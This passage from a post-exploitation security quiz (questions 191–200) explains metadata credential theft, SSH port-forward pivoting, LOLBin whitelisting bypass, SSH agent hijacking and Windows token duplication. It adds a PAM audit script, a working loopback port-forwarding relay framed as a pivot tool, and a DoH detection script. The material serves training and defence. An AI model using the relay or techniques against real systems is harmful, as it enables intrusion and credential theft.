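            stack += auth_stack(line.split()[1], files, seen)
            continue
        m = LINE_RE.match(line)
        if not m or m.group(1) != 'auth':
            continue
        control, module = m.group(2), m.group(3)
        if control in ('include', 'substack'):
            stack += auth_stack(module, files, seen)
        else:
            stack.append((name, control, module))
    return stack


def audit_pamd(files):
    """Return (category, service_file, detail) findings over the resolved auth stacks."""
    findings = []
    for service in files:
        for index, (src, control, module) in enumerate(auth_stack(service, files)):
            if module.startswith('/') and not module.startswith(TRUSTED_MODULE_DIRS):
                finding = ('untrusted_module_path', src, module)
            elif os.path.basename(module) == 'pam_permit.so' and (control == 'sufficient' or index == 0):
                finding = ('permissive_auth', src, f'auth {control} {module}')
            else:
                continue
            if finding not in findings:                  # the same line reaches several stacks
                findings.append(finding)
    return findings


def demo():
    """Write the sample tree to a temp dir, load it back, and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, text in SAMPLE_PAMD.items():
            with open(os.path.join(tmp, name), 'w', encoding='utf-8') as fh:
                fh.write(text)
        return audit_pamd(load_pamd(tmp))


if __name__ == '__main__':
    for category, service, detail in demo():
        print(f'{category:<22} {service:<12} {detail}')
```

A backdoor that replaces pam_unix.so in place is invisible to this file-level check; for that, verify the package that owns the modules (dpkg --verify libpam-modules or rpm -V pam) and compare module hashes with a clean install of the same version.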
191. How does “Cloud Instance Metadata Abuse” help attackers maintain access?
- A) Extracting temporary access tokens from cloud instance metadata services
- B) Modifying cloud firewall rules to allow persistence
- C) Encrypting cloud storage to demand ransom
- D) Injecting malicious scripts into cloud-based APIs
✅ Answer: A) Extracting temporary access tokens from cloud instance metadata services
Explanation: The instance metadata service (169.254.169.254 on AWS, Azure and GCP) hands the instance's IAM role or managed-identity credentials to anything that can reach it, so code execution or an SSRF on the instance yields short-lived but fully usable cloud credentials. AWS IMDSv2 requires a PUT to obtain a session token (and a hop limit), Azure requires the Metadata: true header and GCP requires Metadata-Flavor: Google, which stops simple SSRF but not code running on the host; the credentials must be re-fetched as they rotate.
192. What is “Local Port Forwarding” used for in post-exploitation?
- A) Redirecting network traffic from a local port to a remote system
- B) Encrypting stolen credentials before exfiltration
- C) Modifying Windows Defender exclusions via registry keys
- D) Bypassing two-factor authentication on cloud services
✅ Answer: A) Redirecting network traffic from a local port to a remote system
Explanation: With SSH, ssh -L 8080:internal-host:80 pivot binds port 8080 on the attacker's machine and sends each connection through the pivot to internal-host:80, so the attacker reaches services that only the pivot can see; remote forwarding (ssh -R) goes the other way and publishes a port on the far side. Meterpreter's portfwd and tools such as Chisel implement the same relay without SSH.
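To make the direction of the relay concrete (this is an added example, not code from the quiz or from OpenSSH), the script below implements the listening half of local port forwarding as it would run on a pivot: it accepts connections on one port and relays them to a target the pivot can reach, which also shows why a bind-style listener (question 186) needs inbound access. The demo starts a loopback echo server as the stand-in internal service and pushes a message through the forwarder; every host, port and payload is constructed for the demo.

```python
import socket
import threading


def relay(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so the peer sees EOF too."""
    try:
        while chunk := src.recv(65536):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class LocalForwarder:
    """Accept on (listen_host, listen_port) and relay each connection to the target.

    This is the pivot-side equivalent of `ssh -L listen_port:target_host:target_port`:
    the listener is what the attacker connects to, the target is what only the pivot sees."""

    def __init__(self, listen_host, listen_port, target_host, target_port):
        self.target = (target_host, target_port)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((listen_host, listen_port))
        self.listener.listen(16)
        self.bound_port = self.listener.getsockname()[1]     # real port when listen_port == 0
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:                                    # listener closed
                return
            threading.Thread(target=self._handle, args=(client,), daemon=True).start()

    def _handle(self, client):
        try:
            upstream = socket.create_connection(self.target, timeout=5)
        except OSError:
            client.close()
            return
        upstream.settimeout(None)
        pumps = [threading.Thread(target=relay, args=(client, upstream)),
                 threading.Thread(target=relay, args=(upstream, client))]
        for t in pumps:
            t.start()
        for t in pumps:
            t.join()
        client.close()
        upstream.close()

    def close(self):
        self.listener.close()


def start_echo_server(host='127.0.0.1'):
    """Stand-in for the internal service the pivot can reach; returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(8)

    def echo(conn):
        relay(conn, conn)            # echo until the client half-closes, then half-close back
        conn.close()

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=echo, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def demo(payload=b'hello through the pivot'):
    """Send payload through the forwarder to the echo service and return what comes back."""
    srv, target_port = start_echo_server()
    fwd = LocalForwarder('127.0.0.1', 0, '127.0.0.1', target_port)
    try:
        with socket.create_connection(('127.0.0.1', fwd.bound_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)                         # done sending; wait for the echo
            received = b''
            while chunk := c.recv(65536):
                received += chunk
        return received
    finally:
        fwd.close()
        srv.close()


if __name__ == '__main__':
    print(demo())
```

Bind the listener to an interface the attacker can reach and point the target at an internal host and this is the service that portfwd add or Chisel provide. From the defender's side the tell on the pivot is one process holding both a new listening socket and an outbound connection whose byte counts mirror each other.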
193. What is the purpose of “Application Whitelisting Bypass” in post-exploitation?
- A) Executing malware by abusing trusted applications that are allowed to run
- B) Modifying BIOS firmware to execute malicious payloads
- C) Extracting passwords from NTDS.dit on a domain controller
- D) Running brute-force attacks on OAuth tokens
✅ Answer: A) Executing malware by abusing trusted applications that are allowed to run
Explanation: Whitelisting bypass uses legitimate, signed Microsoft binaries (LOLBins) such as mshta.exe, certutil.exe, rundll32.exe, regsvr32.exe or msbuild.exe to fetch and run payloads, because the allow-list already trusts them by publisher or path. The defense is to block or restrict the specific LOLBins that have no business purpose and to avoid broad publisher and path rules.
194. How do attackers use “SSH Agent Hijacking” to maintain access?
- A) Hijacking an existing SSH agent session to authenticate without needing credentials
- B) Injecting malicious payloads into SSH configuration files
- C) Modifying firewall rules to allow SSH brute-force attacks
- D) Disabling security monitoring on Linux servers
✅ Answer: A) Hijacking an existing SSH agent session to authenticate without needing credentials
Explanation: ssh-agent holds unlocked private keys and answers signing requests over a Unix socket named in SSH_AUTH_SOCK. Root on a host, or anyone who can reach the socket of a forwarded agent (ForwardAgent yes), can point SSH_AUTH_SOCK at it and authenticate anywhere those keys are trusted for as long as the agent session lasts; the keys themselves never leave the agent. Use ProxyJump instead of agent forwarding, and ssh-add -c so each use requires confirmation.
195. What is the primary goal of “IPv6 Tunneling Abuse” in post-exploitation?
- A) Bypassing security controls by encapsulating traffic within IPv6 packets
- B) Encrypting all network traffic between compromised hosts
- C) Modifying DNS records to redirect users to malicious websites
- D) Injecting payloads into HTTP headers
✅ Answer: A) Bypassing security controls by encapsulating traffic within IPv6 packets
Explanation: Many networks run IPv4 internally but leave IPv6 enabled on hosts; carrying C2 over IPv6, or over transition mechanisms such as Teredo, 6to4 and ISATAP that wrap IPv6 in IPv4/UDP, slips past firewall rules, IDS signatures and proxies written only for IPv4. Disable transition technologies that are not in use and give IPv6 the same filtering and monitoring as IPv4.
196. What is “Quark Engine Bypass” in post-exploitation?
- A) Evading Quark Engine malware analysis on Android
- B) Injecting malicious PowerShell scripts into scheduled tasks
- C) Exploiting Kerberos authentication vulnerabilities
- D) Manipulating web application firewalls to allow SQL injection
✅ Answer: A) Evading Quark Engine malware analysis on Android
Explanation: Quark Engine is an open-source Android malware analysis and scoring tool that rates an APK by matching sequences of API calls and permissions against behavior rules. Bypassing it means obfuscating or restructuring the app (reflection, dynamic loading, splitting a behavior across components) so the rules no longer match, which is the same evasion idea applied to any signature-like analyzer.
197. How does “Windows Error Reporting (WER) Abuse” help attackers evade detection?
- A) Hijacking Windows Error Reporting services to execute malicious payloads
- B) Disabling event logging for failed authentication attempts
- C) Injecting payloads into active RDP sessions
- D) Encrypting forensic logs to hide evidence
✅ Answer: A) Hijacking Windows Error Reporting services to execute malicious payloads
Explanation: WER Abuse uses Windows Error Reporting components as a trusted host: WerFault.exe is a signed Microsoft binary that can be used for DLL side-loading, and WER's crash-handling settings give an attacker a way to have a process launched by a trusted service. The malicious code then runs under a process name that analysts and allow-lists expect to see.
198. What is “DNS Over HTTPS (DoH) Abuse” used for in post-exploitation?
- A) Exfiltrating data stealthily by encrypting DNS queries inside HTTPS requests
- B) Injecting malicious JavaScript into HTTPS requests
- C) Modifying DNS records to redirect network traffic
- D) Running brute-force attacks on DNS servers
✅ Answer: A) Exfiltrating data stealthily by encrypting DNS queries inside HTTPS requests
Explanation: DNS over HTTPS (RFC 8484) carries DNS queries inside HTTPS, so DNS-based monitoring and sinkholes never see the queries; an attacker can use a public DoH resolver or run a private DoH endpoint and tunnel C2 or exfiltration inside it. Counter it by blocking known DoH resolvers, forcing all name resolution through the enterprise resolver, and watching for HTTPS traffic with the /dns-query path or the application/dns-message content type at the proxy.
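A detection, as an added example that is not from the quiz or from any vendor: the script below scores proxy log records for DoH using three request-level signals (a known public resolver, the RFC 8484 path /dns-query together with the application/dns-message content type, and a base64url dns= parameter that actually decodes to a DNS query) and then aggregates per source and host to catch tunnelling volume. The log lines are constructed; the base64url blob is the query for www.example.com given in RFC 8484; the hosts in KNOWN_DOH_HOSTS are real public resolvers.

```python
import base64
import struct
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Public DoH resolvers; extend from your threat-intel feed.
KNOWN_DOH_HOSTS = {'cloudflare-dns.com', 'mozilla.cloudflare-dns.com', 'dns.google',
                   'dns.quad9.net', 'doh.opendns.com'}

# Constructed proxy log (key=value per line, not from any real environment).
SAMPLE_LOG = """\
ts=2024-05-01T10:00:01Z src=10.0.0.5 host=cloudflare-dns.com method=POST path=/dns-query ctype=application/dns-message
ts=2024-05-01T10:00:02Z src=10.0.0.5 host=cloudflare-dns.com method=POST path=/dns-query ctype=application/dns-message
ts=2024-05-01T10:00:02Z src=10.0.0.5 host=cloudflare-dns.com method=POST path=/dns-query ctype=application/dns-message
ts=2024-05-01T10:00:03Z src=10.0.0.7 host=www.example.com method=GET path=/index.html ctype=-
ts=2024-05-01T10:00:04Z src=10.0.0.9 host=cdn-updates.example.net method=GET path=/dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB ctype=-
ts=2024-05-01T10:00:05Z src=10.0.0.7 host=www.example.com method=GET path=/dns-query-faq.html ctype=-
"""


def parse_line(line):
    """Split one 'key=value key=value' record into a dict (values contain no spaces)."""
    return dict(field.split('=', 1) for field in line.split())


def looks_like_dns_query(b64):
    """True if the base64url blob decodes to a DNS wire-format query (RFC 8484 GET form)."""
    try:
        raw = base64.urlsafe_b64decode(b64 + '=' * (-len(b64) % 4))
    except ValueError:
        return False
    if len(raw) < 12:                                   # shorter than a DNS header
        return False
    _id, flags, qdcount, ancount = struct.unpack('>HHHH', raw[:8])
    # QR bit clear (a query), at least one question, no answers
    return (flags & 0x8000) == 0 and qdcount >= 1 and ancount == 0


def classify(rec):
    """Return the set of DoH indicators present on one request record."""
    reasons = set()
    if rec.get('host', '').lower() in KNOWN_DOH_HOSTS:
        reasons.add('known-doh-resolver')
    url = urlsplit(rec.get('path', ''))
    if url.path == '/dns-query':                        # exact match: /dns-query-faq.html is not DoH
        reasons.add('dns-query-path')
    if rec.get('ctype', '') == 'application/dns-message':
        reasons.add('dns-message-content-type')
    for blob in parse_qs(url.query).get('dns', []):
        if looks_like_dns_query(blob):
            reasons.add('dns-wire-in-query')
    return reasons


def detect(log_text, burst_threshold=3):
    """Aggregate indicators per (src, host); a count at or above the threshold adds 'high-rate'.

    Volume matters because a DoH tunnel issues far more resolver requests than a
    browser that merely resolves names over HTTPS."""
    hits = defaultdict(lambda: {'count': 0, 'reasons': set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        reasons = classify(rec)
        if reasons:
            entry = hits[(rec['src'], rec['host'])]
            entry['count'] += 1
            entry['reasons'] |= reasons
    findings = []
    for (src, host), entry in hits.items():
        if entry['count'] >= burst_threshold:
            entry['reasons'].add('high-rate')
        findings.append({'src': src, 'host': host, 'count': entry['count'],
                         'reasons': sorted(entry['reasons'])})
    return findings


if __name__ == '__main__':
    for f in detect(SAMPLE_LOG):
        print(f"{f['src']:<10} {f['host']:<26} n={f['count']} {', '.join(f['reasons'])}")
```

The second finding is the one that matters most: an unlisted host answering /dns-query with DNS wire format is a private DoH endpoint, which is what a C2 operator runs. Once DoH is blocked at the proxy and the enterprise resolver is enforced, any such traffic is by definition unsanctioned and the allow-list of known resolvers becomes a block-list.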
199. How does “Task Scheduler Abuse” help attackers maintain persistence?
- A) Creating hidden scheduled tasks to execute malware automatically
- B) Modifying system startup scripts to disable antivirus
- C) Encrypting the Windows registry to store payloads
- D) Injecting PowerShell scripts into system processes
✅ Answer: A) Creating hidden scheduled tasks to execute malware automatically
Explanation: Task Scheduler Abuse registers a task (schtasks /create or the API) that runs the payload at logon, on a timer, or on an event trigger, often as SYSTEM. Task creation is recorded as Security event 4698 when object auditing is enabled and in the Microsoft-Windows-TaskScheduler/Operational log, and every task's XML lands under C:\Windows\System32\Tasks, so comparing that folder with schtasks output exposes tasks hidden from the API.
200. What is the purpose of “System Token Duplication” in privilege escalation?
- A) Copying a high-privilege security token and using it for unauthorized access
- B) Spoofing authentication headers to bypass web security controls
- C) Encrypting stolen credentials before exfiltration
- D) Injecting payloads into biometric authentication systems
✅ Answer: A) Copying a high-privilege security token and using it for unauthorized access
Explanation: Windows represents a logon's identity as an access token. With SeDebugPrivilege an attacker opens a SYSTEM process, calls OpenProcessToken and DuplicateTokenEx, and then ImpersonateLoggedOnUser or CreateProcessWithTokenW to run as SYSTEM; Meterpreter's incognito and mimikatz token::elevate automate the sequence. No password or hash is involved, which is why limiting who holds SeDebugPrivilege and SeImpersonatePrivilege matters.